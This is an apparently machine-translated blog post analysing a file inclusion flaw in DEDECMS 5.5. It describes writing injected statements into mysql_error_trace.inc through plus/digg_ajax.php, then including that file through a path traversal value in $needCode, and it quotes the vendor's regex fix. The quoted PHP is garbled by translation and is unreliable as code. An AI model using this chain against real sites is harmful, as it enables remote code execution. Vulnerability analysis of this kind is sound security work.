Analysis of DEDECMS 5.5 datalistcp. class. php inclusion

Www.st0p.org

I have long seen some holes, and I have been thinking about writing analysis. I have been installing things in UBUNTU recently .. Forget it...
Sometimes some friends add me and teach him to find holes... This seems to be a tiring job, and luck accounts for a large part... So I try my best to help the analysis process and make it easier for me to learn.
Specific EXP, see: html "> http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html

In the past, DEDECMS wrote the wrong SQL information into mysql_error_trace.php, which was later revealed by the experts. The name is mysql_error_trace.inc...
I didn't expect it to be included again this time... It seems that recording SQL information is not a good thing...

The principle of this EXP is to write our statement to mysql_error_trace.inc by constructing a special request for plus/digg_ajax.php. Of course there are still many files that can be written to mysql_error_trace.inc in this step .. But it is impossible to execute it .. The hole reported this time can be met only with good luck ..
Key code exists in

/Include/datalistcp. class. php

 

...
$ Codefile = (isset ($ needCode )? $ NeedCode: $ pai_soft_lang );
 
// Use the isset function to check whether $ needCode is configured. If yes, the result is $ needCode. Otherwise, the result is $ yun_soft_lang.
// When the counterfeit result is aa/.../../data/mysql_error_trace
 
If (file_exists (DEDEINC./code/datalist... $ codefile.. inc ))
 
{
 
Require_once (DEDEINC./code/datalist... $ codefile.. inc );
// The suffix is. inc.
}
// Check whether the file exists. If yes, it contains. We successfully jumped to the data directory through ../, including the mysql_error_trace.inc we just constructed.
// Successfully run the statement constructed by mysql_error_trace.inc...
...
 

Depressed. The official website has not completed the analysis several times before .. I just went to the official website and fixed it through regular expressions.

 

$ Codefile = (isset ($ needCode )? $ NeedCode: $ pai_soft_lang );
 
$ Codefile = preg_replace ("/[w-]/", $ codefile );
// Use regular expressions to filter out...
If (file_exists (DEDEINC./code/datalist... $ codefile.. inc ))
 
{
 
Require_once (DEDEINC./code/datalist... $ codefile.. inc );
 
}